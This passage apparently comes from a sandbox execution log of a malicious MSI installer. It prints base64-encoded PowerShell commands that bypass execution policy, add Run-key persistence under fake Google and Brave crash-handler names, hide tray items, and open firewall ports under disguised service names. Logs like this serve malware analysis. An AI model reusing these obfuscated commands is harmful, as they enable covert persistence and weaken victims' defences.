FAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACIAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAbQBhAGsAZQAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAbQBhAGsAZQAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBtAGEAawBlACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBtAGEAawBlACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAZQBkAGkAdAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARQBtAGIAZQBkAGkAdAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBlAGQAaQB0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBFAG0AYgBlAGQAaQB0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA=
      4⤵
      PID:4696
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:5660
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss88BD.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi88BA.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr88BB.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr88BC.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:3812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcACIAIAAtAE4AYQBtAGUAIAAiAEUAeABwAGwAbwByAGUAcgAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAFQAcgBhAHkASQB0AGUAbQBzAEQAaQBzAHAAbABhAHkAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAIgAgAC0ATgBhAG0AZQAgACIARQB4AHAAbABvAHIAZQByACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAEUAeABwAGwAbwByAGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AVAByAGEAeQBJAHQAZQBtAHMARABpAHMAcABsAGEAeQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAE4AbwBUAHIAYQB5AEkAdABlAG0AcwBEAGkAcwBwAGwAYQB5ACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQA=
      4⤵
      PID:4792
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1568
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss8B14.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi8B11.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr8B12.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr8B13.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAyACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEQAYQB0AGEAIABDAG8AbABsAGUAYwB0AGkAbwBuAFwAIgAgAC0ATgBhAG0AZQAgAEEAbABsAG8AdwBUAGUAbABlAG0AZQB0AHIAeQAgAC0AVgBhAGwAdQBlACAAMAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFcAaQBuAGQAbwB3AHMAIABTAGUAYQByAGMAaAAiACAALQBOAGEAbQBlACAAQQBsAGwAbwB3AEMAbwByAHQAYQBuAGEAIAAtAFYAYQBsAHUAZQAgADAAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgAKAEcAZQB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBQAGEAdABoACAAIgBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAE0AZQBtAG8AcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAXAAiACAAfAAgAEQAaQBzAGEAYgBsAGUALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAAoARABpAHMAYQBiAGwAZQAtAE0ATQBBAGcAZQBuAHQAIAAtAG0AYwAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEwAbwBjAGEAbABQAG8AcgB0ACAAOAAwACwAIAA0ADQAMwAsACAAMgAwADIAMAAsACAAMgAyADIAMgAsACAAMwAxADAAMAAsACAAMwAzADMAMwAsACAANAAwADQAMAAsACAANAA0ADQANAAsACAANAA0ADQAOQAsACAANgAwADYAMAAsACAAOAAwADgAMAAsACAAOAA4ADgAOAAsACAAOQAyADAAMAAsACAAMQAwADEAMgA4ACwAIAAxADAANgAwADAALAAgADEAMAA2ADQAMwAsACAAMQAyADAAMgAwACwAIAAxADgAOAA4ADgALAAgADEAOAAxADkAMgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBQAHIAbwB0AG8AYwBvAGwAIABUAEMAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADIAMgAyACwAIAAzADEAMAAwACwAIAAzADMAMwAzACwAIAA0ADAANAAwACwAIAA0ADQANAA0ACwAIAA0